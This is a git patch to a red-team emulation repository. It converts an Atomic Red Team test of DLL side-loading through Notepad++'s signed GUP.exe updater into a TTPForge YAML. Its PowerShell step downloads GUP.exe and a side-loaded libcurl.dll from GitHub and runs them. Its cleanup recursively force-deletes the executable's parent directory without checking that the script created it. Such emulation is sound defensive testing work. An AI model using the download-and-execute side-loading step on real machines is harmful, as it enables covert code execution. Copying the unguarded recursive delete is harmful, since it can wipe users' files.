From 56bdcf5d81ead16a30008cf84f9c778ae809ab1d Mon Sep 17 00:00:00 2001
From: Jasmine Le <jasminele@meta.com>
Date: Tue, 17 Sep 2024 13:59:05 -0700
Subject: [PATCH] Update Windows Atomic Tests to TTP #2

Summary:
Converting atomics to ttps in Windows Atomic Red Team Tests
This ttp was 2/10 and it performs the follow function:
DLL Side-Loading using the Notepad++ GUP.exe binary

Reviewed By: godlovepenn

Differential Revision: D62892914
---
 .../windows/dll-side-loading/README.md        |  7 +-
 .../dll-side-loading/dll-side-loading.yaml    | 81 ++++++++++++++-----
 2 files changed, 67 insertions(+), 21 deletions(-)

diff --git a/ttps/persistence/windows/dll-side-loading/README.md b/ttps/persistence/windows/dll-side-loading/README.md
index d7f5830..dfca11f 100644
--- a/ttps/persistence/windows/dll-side-loading/README.md
+++ b/ttps/persistence/windows/dll-side-loading/README.md
@@ -8,11 +8,12 @@ Derived from [Atomic Red Team T1574.002](https://github.com/redcanaryco/atomic-r
 
 ## Arguments
 - **process_name**:  a string flag specifying the name of created calc process. Default is "CalculatorApp".
-- **gup_exe**: a path flag specifying location of GUP.exe. Default is "bin\GUP.exe".
-- **curl_dll**: a path flag specifying location of libcurl.dll. Default is "bin\libcurl.dll".
+- **gup_exe**: a string flag specifying location of GUP.exe. Default is "$PWD\bin\GUP.exe".
+- **curl_dll**: a string flag specifying location of libcurl.dll. Default is "$PWD\bin\libcurl.dll".
 
 ## Pre-requisites
 - Windows operating system equipped with powershell
+- libcurl.dll and GUP.exe must be in the same directory
 
 ## Examples
 You can run the TTP using the following example (after updating the arguments):
@@ -23,7 +24,7 @@ ttpforge run forgearmory//persistence/windows/dll-side-loading/dll-side-loading.
 ttpforge run forgearmory//persistence/windows/dll-side-loading/dll-side-loading.yaml --arg process_name=calc
 ```
 ```bash
-ttpforge run forgearmory//persistence/windows/dll-side-loading/dll-side-loading.yaml --arg gup_exe=bin\myGUP.exe --arg curl_dll=bin\mylibcurl.dll
+ttpforge run forgearmory//persistence/windows/dll-side-loading/dll-side-loading.yaml --arg gup_exe=test\myGUP.exe --arg curl_dll=test\mylibcurl.dll
 ```
 
 ## Steps
diff --git a/ttps/persistence/windows/dll-side-loading/dll-side-loading.yaml b/ttps/persistence/windows/dll-side-loading/dll-side-loading.yaml
index 3ab8af1..fb3e93e 100644
--- a/ttps/persistence/windows/dll-side-loading/dll-side-loading.yaml
+++ b/ttps/persistence/windows/dll-side-loading/dll-side-loading.yaml
@@ -3,8 +3,8 @@ api_version: 2.0
 uuid: a0dbea02-4978-4318-9af7-1aef1e2d2409
 name: DLL Side-Loading using the Notepad++ GUP.exe binary
 description: |
-  GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded.
-  Upon execution, calc.exe will be opened.
+  GUP is an open source signed binary used by Notepad++ for software updates, and it is vulnerable to DLL Side-Loading.
+  This enables the libcurl dll to be loaded and upon execution, calc.exe will be opened.
   Derived from https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary
 requirements:
   platforms:
@@ -23,40 +23,85 @@ args:
     default: CalculatorApp
   - name: gup_exe
     description: GUP is an open source signed binary used by Notepad++ for software updates
-    type: path
-    default: bin\GUP.exe
+    type: string
+    default: $PWD\bin\GUP.exe
   - name: curl_dll
     description: GUP requires libcurl.dll to function
-    type: path
-    default: bin\libcurl.dll
+    type: string
+    default: $PWD\bin\libcurl.dll
 
 steps:
   - name: execute_GUP
     executor: powershell
     description: |
-        GUP.exe binary must exist on disk at specified location ({{.Args.gup_exe}}).
         Downloads GUP.exe, if not provided, and executes binary.
     inline: |
-      $parent = Split-Path "{{.Args.gup_exe}}" -Parent
+
+      Write-Host "GUP.exe binary must exist on disk at specified location ({{.Args.gup_exe}})."
+
+      $parentExe = Split-Path "{{.Args.gup_exe}}" -Parent
+      $parentDll = Split-Path "{{.Args.curl_dll}}" -Parent
+
+      if ($parentExe -cne $parentDll){
+        Write-Host "Error: GUP.exe and libcurl.dll must be in the same directory."
+        Write-Host "GUP.exe at: {{.Args.gup_exe}}"
+        Write-Host "libcurl.dll at: {{.Args.curl_dll}}"
+        exit 1
+      }
+
       if (-Not (Test-Path "{{.Args.gup_exe}}")) {
-        New-Item -Type Directory -Path ${parent} -ErrorAction Ignore | Out-Null
-        Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "{{.Args.gup_exe}}"
-        New-Item -ItemType File -Path "${parent}\.downloaded" -ErrorAction ignore | Out-Null
+        Write-Host "GUP.exe not found. Downloading..."
+        New-Item -Type Directory -Path ${parentExe} -ErrorAction Ignore | Out-Null
+        try {
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "{{.Args.gup_exe}}"
+        } catch {
+          Write-Host "Failed to download GUP.exe : $_"
+          exit 1
+        }
+        Write-Host "GUP.exe downloaded to: {{.Args.gup_exe}}"
+      } else {
+          Write-Host "GUP.exe already exists at: {{.Args.gup_exe}}"
       }
+
       if (-Not (Test-Path "{{.Args.curl_dll}}")) {
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/libcurl.dll?raw=true" -OutFile "${parent}\libcurl.dll"
-          New-Item -ItemType File -Path "${parent}\.downloaded" -ErrorAction ignore | Out-Null
+          Write-Host "libcurl.dll not found. Downloading..."
+          New-Item -Type Directory -Path ${parentDll} -ErrorAction Ignore | Out-Null
+          try {
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/libcurl.dll?raw=true" -OutFile "{{.Args.curl_dll}}"
+        } catch {
+          Write-Host "Failed to download libcurl.dll : $_"
+          exit 1
+        }
+        Write-Host "libcurl.dll downloaded to: {{.Args.curl_dll}}"
       } else {
-          Copy-Item -Path "{{.Args.curl_dll}}" -Destination "${parent}\libcurl.dll"
+          Write-Host "libcurl.dll already exists at: {{.Args.curl_dll}}"
       }
 
-      &"{{.Args.gup_exe}}"
+      Write-Host "Executing GUP.exe to test sideloading ....."
+      &{{.Args.gup_exe}}
 
     cleanup:
       executor: powershell
       inline: |
-        stop-process -name {{.Args.process_name}}
+        try {
+          Write-Host "Attempting to stop {{.Args.process_name}} process..."
+          Stop-Process -Name "{{.Args.process_name}}" -ErrorAction Stop
+          Write-Host "Successfully stopped {{.Args.process_name}}"
+        } catch {
+          Write-Host "Failed to stop {{.Args.process_name}}: $_"
+        }
+
         $parent = Split-Path "{{.Args.gup_exe}}" -Parent
-        if (Test-Path "${parent}\.downloaded"){
-          remove-item -r $parent
+        Write-Host "Parent directory to clean up: $parent"
+
+        if (Test-Path $parent) {
+          Write-Host "Attempting to remove directory: $parent"
+          Remove-Item -Path $parent -Recurse -Force -ErrorAction SilentlyContinue
+          if ($?) {
+            Write-Host "Successfully removed $parent"
+          } else {
+            Write-Host "Failed to remove $parent"
+          }
+        } else {
+          Write-Host "Directory $parent does not exist. No cleanup needed."
         }